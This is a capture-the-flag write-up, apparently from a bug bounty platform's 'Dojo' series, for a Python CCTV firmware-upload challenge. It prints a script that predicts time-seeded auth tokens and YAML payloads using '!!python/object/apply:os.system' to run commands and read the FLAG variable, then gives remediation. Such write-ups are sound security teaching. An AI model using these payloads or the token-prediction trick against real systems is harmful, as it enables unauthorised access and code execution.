The Dojo challenge CCTV Manager tasked participants with predicting a pseudo-random token to gain access, then exploiting an authorized YAML deserialization vulnerability to achieve remote code execution (RCE), ultimately allowing the attacker to capture the flag.
💡 Want to create your own monthly Dojo challenge? Send us a message on X!
The winners
Congrats to mayaar, stealthcopter and Pr1nc3ss for the best write-ups 🥳
The swag is on its way! 🎁
Subscribe to our X and/or LinkedIn feeds to be notified of upcoming challenges.
Read on to find out how one of the winners managed to solve the challenge.
TALKIE PWNII #8: VIDEO CHALLENGE WRITE-UP
OVERALL BEST WRITE-UP
We would like to thank everyone who participated and reported their solution for this challenge to the Dojo program. There were many great reports for this challenge and you can find the best write-up below:
CCTV Manager challenge Write-up by Pr1nc3ss
Description
The python application allows the user to upload a custom firmware in YAML text format to update a CCTV camera. The request is only valid if a token is provided alongside the firmware.
The upload mechanism has two vulnerabilities that will be exposed and explained in this report; chaining the vulnerabilities allows us to bypass the security feature in place and execute arbitrary code on the server side.
The most proeminent vulnerability is an OS Command Injection. Such attack can lead to leak sensitive data, perform remote code execution and constitutes a real threat to any system.
Code analysis
Code setup loads a variable into the system environment variables as FLAG
, for the sake of the demonstration we will get this value.
import os
os.chdir('tmp')
os.mkdir('templates')
os.environ["FLAG"] = flag
The python code contains a main()
function that handles the whole logic. In pseudocode it acts following these steps :
- Generates a
tokenRoot
- Loads the user firmware input as
yamlConfig
and the user provided authorization token astokenGuest
- Checks if user is authorized by comparing
tokenGuest
totokenRoot
, if not the user gets an error - Parses the user provided
yamlConfig
variable and populates thefirmware
data property - Executes the firmware
update()
function
All these steps can be divided into two parts :
Authorization
Execution
For reading clarity, demonstration out of scope code will be replaced by [...]
.
Authorization
The code logic is straigthforward.
def main():
tokenRoot = genToken(int(time.time()) // 1) # tokenRoot is generated
[...]
tokenGuest = unquote("") # tokenGuest is populated with user provided token
access = bool(tokenGuest == tokenRoot) # comparison is made
[...]
if access: # condition check
[...]
print( template.render(access=access) )
The generation token method is as follows :
def genToken(seed:str) -> str:
random.seed(seed)
return ''.join(random.choices('abcdef0123456789', k=16))
[...]
genToken(int(time.time()) // 1)
Read alongside the function call, it is obvious that the seed is the time integer. Whereas time.time()
returns a float
, casting it as an integer removes the decimals. The division by 1 is redundant as it does not change the value.
This means that tokens are predictable, as the seed can be known we can virtually create any token for any time since Epoch and to come.
Execution
As for the authorization, the code logic is pretty straigthforward.
def main():
[...]
yamlConfig = unquote("") # raw user input
[...]
firmware = None # function variable
[...]
data = yaml.load(yamlConfig, Loader=yaml.Loader) # yaml parsing
firmware = Firmware(**data["firmware"]) # firmware property population
firmware.update()
print( template.render(access=access) )
Focus has to be made on the yaml.load()
function, as we can see, it uses the default yaml.Loader
without any configuration modification.
Without the necessity to dive too deep, the default yaml.Loader
, it is instanciated with the default constructor :
# Constructor is same as UnsafeConstructor. Need to leave this in place in case
# people have extended it directly.
class Constructor(UnsafeConstructor):
pass
class UnsafeConstructor(FullConstructor):
def find_python_module(self, name, mark):
return super(UnsafeConstructor, self).find_python_module(name, mark, unsafe=True)
def find_python_name(self, name, mark):
return super(UnsafeConstructor, self).find_python_name(name, mark, unsafe=True)
def make_python_instance(self, suffix, node, args=None, kwds=None, newobj=False):
return super(UnsafeConstructor, self).make_python_instance(
suffix, node, args, kwds, newobj, unsafe=True)
def set_python_instance_state(self, instance, state):
return super(UnsafeConstructor, self).set_python_instance_state(
instance, state, unsafe=True)
In the above snippet, super([...], unsafe=True)
calls inside UnsafeConstructor()
are of critical importance. Set as is, they explicitly permit resolution of Python modules, names and even instances.
Thus having for direct effect that the use of yaml.load(..., Loader=yaml.Loader)
enables arbitrary code execution as the yaml.Loader
constructor inherits from UnsafeConstructor
. This allows unsafe object deserialization via YAML tags such as !!python/object/apply
.
Exploitation
The exploitation has been done in two steps. Following the same logic as the Code analysis
, we will see how the authorization can be abused, allowing us to access to the firmware part. Then we will see how the environment variable can be extracted thanks to the loader configuration.
Authorization
The tokenRoot
generation is time based. This means that if we manage to generate a token in advance we can use it. As a reminder, the float generated by the time function is converted into an integer : int(time.time())
.
This means that that instead of having a full value as 1752785477.7086287
containing second fractions, the code generates 1752785477
which is a full second. As code takes time to run, it is understandable to have a full second instead of a fraction for the code to run as the time needed to process the user input and to compare tokenGuest
and tokenRoot
can't be done in a fraction.
Whereas, this gives us the ability to generate an upcoming token. To do so, we have used the same function as the one used in the application to generate the tokenRoot
with a delay added. This means that we will generate the upcoming token and use it. To avoid wild-guessing how much time ran, a timer has been added to tell us when to press the submit button.
Delay has been set for 7 seconds so we have enough time to copy/paste the upcoming token.
Token generation Code:
import random
import time
delay = 7 # Adjustable delay
def genToken(seed:str) -> str:
random.seed(seed)
return ''.join(random.choices('abcdef0123456789', k=16))
def main():
tokenRoot = genToken(int(time.time()) + delay // 1)
print(tokenRoot)
for i in range(delay - 1):
print(i+1)
time.sleep(1)
print("SUBMIT NOW !!!")
if __name__ == "__main__":
main()
Exploitation
For the exploitation, as seen before during our analysis, code seems to be prone to unsafe object deserialization.
A quick reminder on the python code itself. By analyzing it we know that :
- raw data is read and deserialized from the yaml input thanks to
yaml.load()
- the
firmware
object is populated byFirmware(**data["firmware"])
firmware.update()
does nothing, so the payload has to be executed before
class Firmware():
def __init__(self, version:str):
self.version = version
def update(self):
pass
data = yaml.load(yamlConfig, Loader=yaml.Loader)
firmware = Firmware(**data["firmware"])
So our payload has to be a well-formed YAML as key:value
, and direcly reference firmware
.
First payload is a non-invasive command as id
, here is the poc code :
firmware: !!python/object/apply:os.system ["id"]
As the user id is displayed, it is confirmed that the code is prone to unsafe object deserialization, furthermore it is prone to OS command injection too.
The objective to prove the vulnerability was to get the content of the environment variable that had been set as follow :
os.environ["FLAG"] = flag
An OS command to print the variable has been used, here is the poc code :
firmware: !!python/object/apply:os.system ["echo $FLAG"]
Yet, this only proves that we can read data. A final test has been done to test how safe the system was from this vulnerability. To do so, a modification of the PATH
variables has been done, using this poc code for the example :
firmware: !!python/object/apply:os.system ["export PATH=$PATH:/opt/pr1nc3ss; echo $PATH;"]
As we can see, the system PATH
has been well modified.
Risk
Two vulnerabilities have been identified, furthermore, they can be chained leading to a complete system compromise with minimal effort. Here are the risks by criticity order.
OS Command Injection via YAML Deserialization
This vulnerability allows server-side code execution as proven previously. An attacker can execute arbitrary commands on the host system and :
- read sensitive data (files, environment variables)
- modify server behavior (altering
PATH
) - deploy malware as a reverse shell or other (to confirm)
This has to be considered critical, especially when it is that trivial to exploit with an untrusted user input.
Predictable authentication token
This vulnerability allows authorization bypass, in this case unauthenticated access to a restricted functionality (ie. firmware upload). An attacker can bypass access control by creating tokens based on time.
This has to be considered as high severity as it is easily automatable as seen with the provided code and that only seconds of prediction offset are needed.
Remediation
Secure token generation
- Avoid predictable seeds as time based auth tokens generation like
int(time.time())
- As the functionality allows firmware upload, a more secure auth model would be switching toward JWEs (JSON Web Encryption) or signed JWTs (if confidentiality is not mandatory) :
- JWT/E are not predictable if signed correctly
- Signing them properly makes them Tamper-proof
- JWE are confidential (claims can not be read)
Restrict shell access
- Web user should not be able to execute system wide commands
- User-controlled input should not be passed into
os.system
,subprocess
or similar shell execution functions - If need, use controlled subprocess exection with disabled shell expansion
User input validation
- Sanitize user input
- Add input validation via YAML schema validation (such as Cerberus)
- Harden YAML deserialization
- Do not use
yaml.load()
withyaml.Loader
oryaml.UnsafeLoader
on untrusted input - Use an alternative as
safe_load()
restricts input to standard YAML types (lists, dicts, strings, etc.), blocking Python-specific object tags like!!python/object/apply
- Do not use
Logging and monitoring
- Log failed or malformed YAML uploads
- Monitor for unexpected behaviors (changes to
PATH
, access to out of scope files, etc...) - Isolate the firmware upload/update process from the rest of the server if possible